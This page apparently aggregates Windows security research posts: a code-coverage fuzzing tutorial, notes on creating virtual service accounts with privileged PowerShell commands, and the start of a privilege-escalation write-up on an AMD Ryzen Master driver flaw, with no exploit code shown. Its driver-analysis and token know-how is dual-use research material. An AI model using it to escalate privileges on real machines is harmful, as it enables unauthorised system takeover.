Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Work Items & System Worker Threads - 'Practical Reverse Engineering' solutions - Part 3

10 March 2021 at 00:00
Introduction This post is about ‘Work Items’ , the third part of my ‘Practical Reverse Engineering’ solutions series and a natural continuation to the previous one about kernel system threads. Luckily, thanks to Alex Ionescu, while researching the topic, I had the chance to get a pre-proof copy of Windows Internals 7th edition, Part 2 ahead of time so I could check my initial findings against the ones from the authors of the book.

Windows 10 egghunter (wow64) and more

Introduction Ok, I have a confession to make, I have always been somewhat intrigued by egghunters. That doesn’t mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it’s a good practise to try to avoid egghunters if you can, as they tend to […]

The post Windows 10 egghunter (wow64) and more first appeared on Corelan Cybersecurity Research.

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks ago, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".  I quickly realized that their computers got upgraded to Windows 10. We […]

The post Windows 10 x86/wow64 Userland heap first appeared on Corelan Cybersecurity Research.

EncFSGui – GUI Wrapper around encfs for OSX

Introduction 3 weeks ago, I posted a rant about my frustration/concern related with crypto tools, more specifically the lack of tools to implement crypto-based protection for files on OSX, in a point-&-click user-friendly way.  I listed my personal functional and technical criteria for such tools and came to the conclusion that the industry seem to […]

The post EncFSGui – GUI Wrapper around encfs for OSX first appeared on Corelan Cybersecurity Research.

Crypto in the box, stone age edition

Introduction First of all, Happy New Year to everyone! I hope 2016 will be a fantastic and healthy year, filled with fun, joy, energy, and lots of pleasant surprises. I remember when all of my data would fit on a single floppy disk. 10 times. The first laptops looked like (and felt like) mainframes on […]

The post Crypto in the box, stone age edition first appeared on Corelan Cybersecurity Research.

How to become a pentester

Intro I receive a lot of emails.  (Please don’t make it worse, thanks!)   Unfortunately I don’t have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members […]

The post How to become a pentester first appeared on Corelan Cybersecurity Research.

Analyzing heap objects with mona.py

Introduction Hi all, While preparing for my Advanced exploit dev course at Derbycon, I’ve been playing with heap allocation primitives in IE.  One of the things that causes some frustration (or, at least, tends to slow me down during the research) is the ability to quickly identify objects that may be useful. After all, I’m […]

The post Analyzing heap objects with mona.py first appeared on Corelan Cybersecurity Research.

CSO : Common Sense Operator/Operations

As the CSO/CISO/person responsible for Information Security, your job is to…  well … do you even know?  Does upper management know?  "Our crappy CSO …" and "Our stupid CSO …" are statements commonly used by various (techie) people, throwing their hands up in despair, attempting to prove that their CSO doesn’t understand technology and has […]

The post CSO : Common Sense Operator/Operations first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – On Her Majesty’s Secret Service: GRX & A Spy Agency

Last year, Belgacom got hacked by an intelligence service (GCHQ?), Rob says. “What is so interesting about this hack, why did they hack into Belgacom, what would or could be the purpose of a similar hack?”  Before answering those questions, we need to take a quick look on how mobile networks work and how mobile […]

The post HITB2014AMS – Day 2 – On Her Majesty’s Secret Service: GRX & A Spy Agency first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – Exploring and Exploiting iOS Web Browsers

iOS Browsers & UIWebview iOS is very popular (according to StatCounter, it’s the 3rd most popular platform used).  Mobile browsers take about 20% to 25% of the market share. iOS offers integration with desktop browsers and cloud (so the same data is available to an attacker).  Many 3rd party IOS browsers have similar weaknesses which […]

The post HITB2014AMS – Day 2 – Exploring and Exploiting iOS Web Browsers first appeared on Corelan Cybersecurity Research.

HITB2014AMS – Day 2 – Keynote 4: Hack It Forward

Good morning Amsterdam, good morning readers, welcome to the second day of the Hack In The Box conference. The speaker for the first keynote didn’t show up,  so we’ll jump right into the next keynote. Jennifer starts her keynote by explaining that she’s fortunate to be able to travel to a lot of conferences and […]

The post HITB2014AMS – Day 2 – Keynote 4: Hack It Forward first appeared on Corelan Cybersecurity Research.

System Threads and their elusiveness. 'Practical Reverse Engineering' solutions - Part 2

11 February 2021 at 00:00
Introduction In this second blog post about Practical Revere Engineering solutions I’d like to focus on the following exercise on Page 128. This one is the first related to Asynchronous and Ad-Hoc Execution kernel objects, and specifically on how System Threads are invoked via the PsCreateSystemThread routine. Here is the original exercise statement: After reading some online forums, you notice some people suggesting that PsCreateSystemThread will create a thread in the context of the calling process.

Linked List in the Kernel: 'Practical Reverse Engineering' solutions - Part 1

1 January 2021 at 00:00
Introduction Lately, I dusted off the marvelous ‘Practical Reverse Engineering’ book by Bruce Dang & Co. which made me realize it would be useful to structure notes along each chapter’s exercises. Could be a valuable reference for the future, especially anything related to Chapter 3 (Windows Kernel) onwards. I decided to focus on one of the most basic and still very widespread data structure in kernel land: linked lists.

Fuzzing Like A Caveman 5: A Code Coverage Tour for Cavepeople

By: h0mbre
16 January 2021 at 05:00

Introduction

We’ve already discussed the importance of code coverage previously in this series so today we’ll try to understand some of the very basic underlying concepts, some common approaches, some tooling, and also see what techniques some popular fuzzing frameworks are capable of leveraging. We’re going to shy away from some of the more esoteric strategies and try to focus on what would be called the ‘bread and butter’, well-trodden subject areas. So if you’re new to fuzzing, new to software testing, this blogpost should be friendly. I’ve found that a lot of the terminology used in this space is intuitive and easy to understand, but there are some outliers. Hopefully this helps you at least get on your way doing your own research.

We will do our best to not get bogged down in definitional minutiae, and instead will focus on just learning stuff. I’m not a computer scientist and the point of this blogpost is to merely introduce you to these concepts so that you can understand their utility in fuzzing. In that spirit, if you find any information that is misleading, egregiously incorrect, please let me know.

Thanks to all that have been so charitable on Twitter answering questions and helping me out along the way, people like: @gamozolabs, @domenuk, @is_eqv, @d0c_s4vage, and @naehrdine just to name a few :)

Core Definitions

One of the first things we need to do is get some definitions out of the way. These definitions will be important as we will build upon them in the subsequent explanations/explorations.

Code Coverage

Code coverage is any metric that gives you insight into how much of a program’s code has been reached by a test, input, etc. We won’t spend a lot of time here as we’ve already previously discussed code coverage in previous posts. Code coverage is very important to fuzzing as it allows you to keep track of how much surface area in the target program you are able to reach. You can imagine that if you only explore a small % of the program space, your testing might be limited in comprehensiveness.

Basic Blocks

Let’s get the Wikipedia definition out of the way first:

“In compiler construction, a basic block is a straight-line code sequence with no branches in except to the entry and no branches out except at the exit.”

So a ‘basic block’ is a code sequence that is executed linearly where there is no opportunity for the code execution path to branch into separate directions. Let’s come up with a visual example. Take the following dummy program that gets a password via the command line and then checks that it meets password length requirements:

#include <stdio.h>
#include <stdlib.h>

int length_check(char* password)
{
    long i = 0;
    while (password[i] != '\0')
    {
        i++;
    }

    if (i < 8 || i > 20)
    {
        return 0;
    }

    return 1;
}

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("usage: ./passcheck <password>\n");
        printf("usage: ./passcheck mysecretpassword2021\n");
        exit(-1);
    }

    int result = length_check(argv[1]);

    if (!result)
    {
        printf("password does not meet length requirements\n");
        exit(-1);
    }

    else
    {
        printf("password meets length requirements\n");
    }
}

Once we get this compiled and analyzed in Ghidra, we can see the following graph view of main():

‘Blocks’ is one of those intuitive terms, we can see how the graph view automatically breaks down main() into blocks of code. If you look inside each block, you will see that code execution is unidirectional, there are no opportunities inside of a block to take two or more different paths. The code execution is on rails and the train track has no forks. You can see that blocks terminate in this example with conditional jumps (JZ, JNZ), main returning, and function calls to exit.

Edges/Branches/Transitions

‘Edge’ is one of those terms in CS/graph theory that I don’t think is super intuitive and I much prefer ‘Transition’ or ‘Branch’, but essentially this is meant to capture relationships between basic blocks. Looking back at our basic block graph from Ghidra, we can see that a few different relationships exist, that is to say that there are multiple pathways code execution can take depending on a few conditions.

Basic block 001006cf has a relationship with two different blocks: 001006e4 and 00100706. So code execution inside of 001006cf can reach either of the two blocks it has a relationship with depending on a condition. That condition in our case is the JZ operation depending on whether or not the number of command line arguments is 2:

  • if the number of arguments is not 2, we branch to block 001006e4 organically by just not taking the conditional jump (JZ)
  • if the number of arguments is 2, we branch to block 00100706 by taking the conditional jump

These two possibilities can be referred to as ‘Edges’, so block 01006cf has two edges. You can imagine how this might be important from the perspective of fuzzing. If our fuzzer is only ever exploring one of a basic block’s edges, we are leaving an entire branch untested so it would behoove us to track this type of information.

There’s apparently much more to this concept than I let on here, you can read more on the Wikipedia entry for Control-flow_graph.

Paths

‘Path’ is just the list of basic blocks our program execution traversed. Looking at our example program, there a few different paths as illustrated below with the orange, green and red lines.

Path One: 0x001006cf -> 0x001006e4

Path Two: 0x001006cf -> 0x00100706 -> 0x00100738

Path Three: 0x001006cf -> 0x00100706 -> 0x0000722

Instrumentation

In this blogpost, “Instrumentation” will refer to the process of equipping your fuzzing target with the ability to provide code coverage feedback data. This could mean lots of things. It could be as complex as completely rewriting a compiled binary blob that we have no source code for or as simple as placing a breakpoint on the address of every basic block entry address.

One of the important aspects of instrumentation to keep in mind is the performance penalty incurred by your instrumentation. If your instrumentation provides 50% more useful information than a technique that is 50% less useful but 1000x more performant, you have to consider the tradeoffs. The 50% more data might very well be worth the huge performance penalty, it just depends.

Binary Only

This is a simple one, “Binary Only” refers to targets that we don’t have source code for. So all we have to work with is a binary blob. It can be dynamically linked or static. These types of targets are more prevalent in certain environments, think embedded targets, MacOS, and Windows. There are still binary-only targets on Linux though, they’re just less common.

Even though “binary only” is simple to understand, the implications for gathering code coverage data are far-reaching. A lot of popular code coverage mechanisms rely upon having source code so that the target can be compiled in a certain way that lends itself well to gathering coverage data, for binary-only targets we don’t have the luxury of compiling the target the way that we want. We have to deal with the compiled target the way it is.

Common Strategies

In this section we’ll start looking at common strategies fuzzing tools utilize to gather code coverage data.

Tracking Basic Blocks

One of the most simple ways to gather code coverage is to simply track how many basic blocks are reached by a given input. You can imagine that we are exploring a target program with our inputs and we want to know what code has been reached. Well, we know that given our definition of basic blocks above, if we enter a basic block we will execute all of the code within, so if we just track whether or not a basic block has been reached, we will at least know what paths we have not yet hit and we can go manually inspect them.

This approach isn’t very sophisticated and kind of offers little in the way of high-fidelity coverage data; however, it is extremely simple to implement and works with all kinds of targets. Don’t have source? Throw some breakpoints on it. Don’t have time to write compiler code? Throw some breakpoints on it.

Performance wise, this technique is great. Hitting new coverage will entail hitting a breakpoint, removing the breakpoint and restoring the original contents that were overwritten during instrumentation, saving the input that reached the breakpoint, and continuing on. These events will actually be slow when they occur; however, as you progress through your fuzzing campaign, new coverage becomes increasingly rare. So there is an upfront cost that eventually decreases to near-zero as time goes by.

I’d say that in my limited experience, this type of coverage is typically employed against closed-source targets (binary-only) where our options are limited and this low-tech method works well enough.

Let’s check out @gamozolabs really fast Basic Block tracking coverage tool called Mesos. You can see that it is aimed at use on Windows where most targets will be binary-only. The neat thing about this tool is its performance. You can see his benchmark results in the README:

Registered    1000000 breakpoints in   0.162230 seconds |  6164072.8 / second
Applied       1000000 breakpoints in   0.321347 seconds |  3111897.0 / second
Cleared       1000000 breakpoints in   0.067024 seconds | 14920028.6 / second
Hit            100000 breakpoints in  10.066440 seconds |     9934.0 / second

One thing to keep in mind is that if you use this way of collecting coverage data, you might limit yourself to the first input that reaches a basic block. Say for instance we have the following code:

// input here is an unsigned char buff
if (input[0x9] < 220)
{
    parsing_routine_1(input);
}

else
{
    parsing_routine_2(input);
}

If our first input to reach this code has a value of 200 inside of input[0x9], then we will progress to the parsing_routine_1 block entry. We will remove our breakpoint at the entry of parsing_routine_1 and we will add the input that reached it to our corpus. But now that we’ve reached our block with an input that had a value of 200, we’re kind of married to that value as we will never hit this breakpoint again with any of the other values that would’ve reached it as well. So we’ll never save an input to the corpus that “solved” this basic block a different way. This can be important. Let’s say parsing_routine_1 then takes the entire input, and reads through the input byte-by-byte for the entirety of the input’s length and does some sort of lengthy parsing at each iteration. And let’s also say there are no subsequent routines that are highly stateful where large inputs vary drastically from smaller inputs in behavior. What if the first input we gave the program that solved this block is 1MB in size? Our fuzzers are kind of married to the large input we saved in the corpus and we were kind of unlucky that shorter input didn’t solve this block first and this could hurt performance.

One way to overcome this problem would be to just simply re-instantiate all of your breakpoints periodically. Say you have been running your fuzzer for 10 billion fuzz-cases and haven’t found any new coverage in 24 hours, you could at that point insert all of your already discovered breakpoints once again and try to solve the blocks in a different way perhaps saving a smaller more performant input that solved the block with a input[0x9] = 20. Really there a million different ways to solve this problem. I believe @gamozolabs addressed this exact issue before on Twitter but I wasn’t able to find the post.

All in all, this is a really effective coverage method especially given the variety of targets it works for and how simple it is to implement.

Tracking Edges and Paths

Tracking edges is very popular because this is the strategy employed by AFL and its children. This is the approach where we not only care about what basic blocks are being hit but also, what relationships are being explored between basic blocks.

The AFL++ stats output has references to both paths and edges and implicitly ‘counters’. I’m not 100% sure but I believe their definition of a ‘path’ matches up to ours above. I think they are saying that a ‘path’ is the same as a testcase in their documentation.

I won’t get too in-depth here analyzing how AFL and its children (really AFL++ is quite different than AFL) collect and analyze coverage for a simple reason: it’s for big brain people and I don’t understand much of it. If you’re interested in a more detailed breakdown, head on over to their docs and have a blast.

To track edges, AFL uses tuples of the block addresses involved in the relationship. So in our example program, if we went from block 0x001006cf to block 0x001006e4 because we didn’t provide the correct number of command line arguments, this tuple (0x001006cf , 0x001006e4) would be added to a coverage map AFL++ uses to track unique paths. So let’s track the tuples we would register if we traversed an entire path in our program:

0x001006cf -> 0x00100706 -> 0x00100722

If we take the above path, we can formulate two tuples of coverage data: (0x001006cf, 0x00100706) and (0x00100706, 0x00100722). These can be looked up in AFL’s coverage data to see if these relationships have been explored before.

Not only does AFL track these relationships, it also tracks frequency. So for instance, it is aware of how often each particular edge is reached and explored.

This kind of coverage data is way more complex than merely tracking basic blocks reached; however, getting this level of detail is also not nearly as straightforward.

In the most common case, AFL gets this data by using compile-time instrumentation on the target. You can compile your target, that you have source code for, using the AFL compiler which will emit compiled code with the instrumentation embedded in the target. This is extremely nifty. But it requires access to source code which isn’t always possible.

AFL has an answer for binary-only targets as well and leverages the powerful QEMU emulator to gather similarly detailed coverage data. Emulators have relatively free access to this type of data since they have to take the target instructions and either interpret them (which means simulate their execution) or JIT (just-in-time) compile the blocks into native code and execute them natively. In the case of QEMU here, blocks are JIT’d into native code and stored in a cache so that it could be easily used again by subsequent executions. So when QEMU comes upon a basic block, it can check whether or not this block has been compiled or not already and act accordingly. AFL utilizes this process to track what blocks are being executed and gets very similar data to what it gathers with compile time instrumentation.

I don’t understand all of the nuance here, but a great blogpost to read on the subject is: @abiondo’s post explaining an optimization they made to AFL QEMU mode in 2018. In a grossly short (hopefully not too inaccurate) summary, QEMU would pre-compute what are called direct jumps and compile those blocks into a single block essentially (via keeping execution in natively compiled blocks) as a way to speed things up. Take this toy example for instance:

ADD RAX, 0x8
JMP LAB_0x00100738

Here we have a pre-computable destination to our jump. We know the relative offset to LAB_0x00100738 from our current address (absolute value of current_addr - LAB_0x00100738), so in an emulator we could just take that jump and replace the destination to the compiled block of LAB_0x00100738 and no calculations would need to take place during each execution (only the initial one to calculate the relative offset). This would allow the emulator to progress with native execution without going back into what I would call a ‘simulation-mode’ where it has to calculate the address before jumping to it each time its executed. This is called “block-chaining” in QEMU. Well you can imagine that if this occurs, that huge block of natively executed code (that is really two blocks) is completely opaque to AFL as it’s unaware that two blocks are contained and so it cannot log the edge that was taken. So as a work around, AFL would patch QEMU to no longer do this block-chaining and keep every block isolated so that edges could be tracked. This would mean that at the end of every block, direct jump or not, QEMU would go back into that ‘simulation-mode’ which would incur a performance penalty.

Definitely read through @abiondo’s blogpost though, it’s much more informative.

If you’re wondering what an indirect jump would be, it would be something where the jump location is only known at execution time, something that could look like this in a toy example:

ADD RAX, 0x8
JMP RAX

The only issue with using QEMU to gather our coverage data is it is relatively slow compared to purely native execution. This slowdown can be worth it obviously as the amount of data you get is substantial and sometimes with binary-only targets there are no other alternatives.

Compare Coverage/Compare Shattering

Instead of merely tracking an input or test’s progress through a program’s blocks/edges, compare coverage seeks to understand how much progress our test is making in the program’s comparisons. Comparisons can be done different ways but a common one already exists in our example password program. In the 001006cf block, we have a CMP operation being performed here:

CMP dword ptr [RBP + local_1c], 0x2

A dword is a 4 byte value (32 bits) and this operation is taking our argc value in our program and comparing it with 0x2 to check how many command line arguments were provided. So our two comparison operands are whatever is on the stack at the offset RBP + local_1c and 0x2. If these operands are equal, the Zero Flag will be set and we can utilize a conditional jump with JZ to move accordingly in the program.

But the problem, as it relates to fuzzing, is that this comparison is rather binary. It either sets the Zero Flag or it does not, there is no nuance. We cannot tell how close we came to passing the comparison, to setting the Zero Flag.

So for example, let’s say we were doing a comparison with 0xdeadbeef instead of 0x2. In that case, if we were to submit 0xdeadbebe for the other operand, we’d be much closer to satisfying the JZ condition that we would be if we submitted 0x0.

At a high-level, compare coverage breaks this comparison down into chunks so that progress through the comparison can be tracked with more much granularity than a binary PASS/FAIL. So using compare coverage, this comparison might instead be rewritten as follows:

BEFORE:

Does 0xdeadbebe == 0xdeadbeef ?

AFTER:

Does 0xde == 0xde ? If so, log that we’ve matched the first byte, and

does 0xad == 0xad ? If so, log that we’ve matched the second byte, and

does 0xbe == 0xbe ? If so, log that we’ve matched the third byte, and

does 0xbe == 0xef ? If so, log that we’ve matched both operands completely.

In our AFTER rewrite, instead of getting a binary PASS/FAIL, we instead see that we progressed 75% of the way through the comparison matching 3 out of 4 bytes. Now we know that we can save this input and mutate it further hoping that we can pass the final byte comparison with a correct mutation.

We also aren’t restricted to only breaking down each comparison to bytes, we could instead compare the two operands at the bit-level. For instance we could’ve also compared them as follows:

1101 1110 1010 1101 1011 1110 1110 1111 vs

1101 1110 1010 1101 1011 1110 1011 1110

This could be broken down into 32 separate comparisons instead of our 4, giving us even more fidelity and progress tracking (probably at the expense of performance in practice).

Here we took a 4 byte comparison and broke it down into 4 separate single-byte comparisons. This is also known as “Compare Shattering”. In spirit, it’s very similar to compare coverage. It’s all about breaking down large comparisons into smaller chunks so that progress can be tracked with more fidelity.

Some fuzzers take all compare operands, like 0xdeadbeef in this example, and add them to a sort of magic values dictionary that the fuzzer will randomly insert it into its inputs hoping to pass the comparison in the future.

You can imagine a scenario where a program checks a large value before branching to a complex routine that needs to be explored. Passing these checks is extremely difficult with just basic coverage and would require a lot of human interaction. One could examine a colored graph in IDA that displayed reached blocks and try to manually figure out what was preventing the fuzzer from reaching unreached blocks and determine that a large 32 byte comparison was being failed. One could then adjust their fuzzer to account for this comparison by means of a dictionary or whatever, but this process is all very manual.

There are some really interesting/highly technical means to do this type of thing to both targets with source and binary-only targets!

AFL++ features an LLVM mode where you can utilize what they call “laf-intel instrumentation” which is described here and originally written about here. Straight from laf-intel’s blogpost, we can see their example looks extremely similar to the thought experiment we already went through where they have this source code:

if (input == 0xabad1dea) {
  /* terribly buggy code */
} else {
  /* secure code */
}

And this code snippet is ‘de-optimized’ into several smaller comparisons that the fuzzer can measure its progress through:

if (input >> 24 == 0xab){
  if ((input & 0xff0000) >> 16 == 0xad) {
    if ((input & 0xff00) >> 8 == 0x1d) {
      if ((input & 0xff) == 0xea) {
        /* terrible code */
        goto end;
      }
    }
  }
}

/* good code */

end:

This de-optimized code can be emitted when one opts to specify certain environment variables and utilizes afl-clang-fast to compile the target.

This is super clever and can really take tons of manual effort out of fuzzing.

But what are we to do when we don’t have access to source code and our binary-only target is possibly full of large comparisons?

Luckily, there are open-source solutions to this problem as well. Let’s look at one called “TinyInst” by @ifsecure and friends. I can’t get deep into how this tool works technically because I’ve never used it but the README is pretty descriptive!

As we can see, it is aimed at MacOS and Windows targets in-keeping with its purpose of instrumenting binary only targets. TinyInst gets us coverage by instrumenting select routines via debugger to change the execution permissions so that any execution (not read or write as these permissions are maintained) access to our instrumented code results in a fault which is then handled by the TinyInst debugger where code execution is redirected a re-written instrumented routine/module. So TinyInst blocks all execution of the original module and instead, redirects all that execution to a rewritten module that is inserted into the program. You can see how powerful this can be as it can allow for the breaking down of large comparisons into much smaller ones in a manner very similar to the laf-intel method but for a target that is already compiled. Look at this cool gif showing compare coverage in action from @ifsecure: [https://twitter.com/ifsecure/status/1298341219614031873?s=20]. You can see that he has a program that checks for an 8 byte value, and his fuzzer makes incremental progress through it until it has solved the comparison.

There are some other tools out there that work similarly in theory to TinyInst as well that are definitely worth looking at and they are also mentioned in the README, tools like: DynamoRIO and PIN.

It should also be mentioned that AFL++ also has the ability to do compare coverage tracking even in QEMU mode.

Bonus Land: Using Hardware to Get Coverage Data

That pretty much wraps up the very basics of what type of data we’re interested in, why, and how we might be able to extract it. One type of data extraction method that didn’t come up yet that is particularly helpful for binary-only targets is utilizing your actual hardware to get coverage data.

While it’s not really a ‘strategy’ as the others were, it enables the execution of the strategies mentioned above and wasn’t mentioned yet. We won’t get too deep here. Nowadays, CPUs come chock-full of all kinds of utilities that are aimed at high-fidelity performance profiling. These types of utilities can also be wrangled into giving us coverage data.

Intel-PT is a utility offered by newer Intel CPUs that allows you to extract information about the software you’re running such as control-flow. Each hardware thread has the ability to store data about the application it is executing. The big hang up with using processor trace is that decoding the trace data that is collected has always been painfully slow and cumbersome to work with. Recently however, @is_eqv and @ms_s3c were able to create a very performant library called libxdc which can be used to decode Intel-PT trace data performantly. The graph included in their README is very cool, you can see how much faster it is than the other hardware-sourced coverage guided fuzzing tools while also collecting the highest-fidelity coverage data, what they call “Full Edge Coverage”. Getting your coverage data straight from the CPU seems ideal haha. So for them to be able to engineer a library that gives you what is essentially perfect coverage, and by the way, doesn’t require source code, seems like a substantial accomplishment. I personally don’t have the engineering chops to deal with this type of coverage at the moment, but one day. A lot of popular fuzzers can utilize Intel-PT right out of the box, fuzzers like: AFL++, honggfuzz, and WinAFL.

There are many other such utilities but they are beyond the scope of this introductory blogpost.

Conclusion

In this post we went over some of the building-block terminology used in the space, some very common fundamental strategies that are employed to get meaningful coverage data, and also some of the tooling that is used to extract the data (and in some cases what fuzzing frameworks use what tooling). It should be mentioned that the popular fuzzing frameworks like AFL++ and honggfuzz go through great lengths to make their frameworks as flexible as possible and work with a wide breadth of targets. They often give you tons of flexibility to employ the coverage data extraction method that’s best suited to your situation. Hopefully this was somewhat helpful to begin to understand some of the problems associated with code coverage as it relates to fuzzing.

Linked List in the Kernel: 'Practical Reverse Engineering' solutions - Chapter 3, Part 1

1 January 2021 at 00:00
Introduction Lately, I dusted off the marvelous ‘Practical Reverse Engineering’ book by Bruce Dang & Co. which made me realize it would be useful to structure notes along each chapter’s exercises. Could be a valuable reference for the future, especially anything related to Chapter 3 (Windows Kernel) onwards. I decided to focus on one of the most basic and still very widespread data structure in kernel land: linked lists.

Linked List in the Kernel - 'Practical Reverse Engineering' solutions - Chapter 3 - Part 1

1 December 2020 at 00:00
Introduction Going once again through ‘Practical Reverse Engineering’ book by Bruce Dang & Co. made me realize it would be useful to structure notes together with the chapter’s exercises, as it might be valuable as future reference, especially anything related to Chapter 3 (Windows Kernel) onwards. This one is focusing on one of the most basic and yet much widespread data structures in kernel land: linked lists. The most used list-type in the Windows Kernel is Circular doubly-linked list, so we are going to focus only on this kind.

Creating your own Virtual Service Accounts

By: tiraniddo
26 October 2020 at 23:54

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token
AWESOME DOMAIN\USER

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.



Using LsaManageSidNameMapping to add a name to a SID.

By: tiraniddo
24 October 2020 at 23:23

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache

and

LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)


CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

By: h0mbre
13 October 2020 at 04:00

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.

Checking Permissions

The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.

Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.

Finding Interesting IOCTL Routines

Write What Where Routine

Next, I started looking at the driver in in a free version of IDA. A search for MmMapIoSpace returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.

The first result, sub_140007278, looked very interesting to me.

We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to MmMapIoSpace, it stores the returned pointer value in [rsp+48h+BaseAddress] and does a check to make sure the return value was not NULL. If we have a valid pointer, we then progress into this loop routine on the bottom left.

At the start of the looping routine, we can see that eax gets the value of dword ptr [rsp+48h+NumberOfBytes] and then we compare eax to [rsp+48h+var_24]. This makes some sense because we already know from looking at the API call that [rsp+48h+NumberOfBytes] held the NumberOfBytes parameter for MmMapIoSpace. So essentially what this is looking like is, a check to see if a counter variable has reached our NumberOfBytes value. A quick highlight of eax shows that later it takes on the value of [rsp+48h+var_24], is incremented, and then eax is put back into [rsp+48h+var_24]. Then we’re back at the top of our loop where eax is set equal to NumberOfBytes before every check.

So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our NumberOfBytes value is reached. Once that value is reached, we see the other branch in our loop when our NumberOfBytes value is reached is a call to MmUnmapIoSpace.

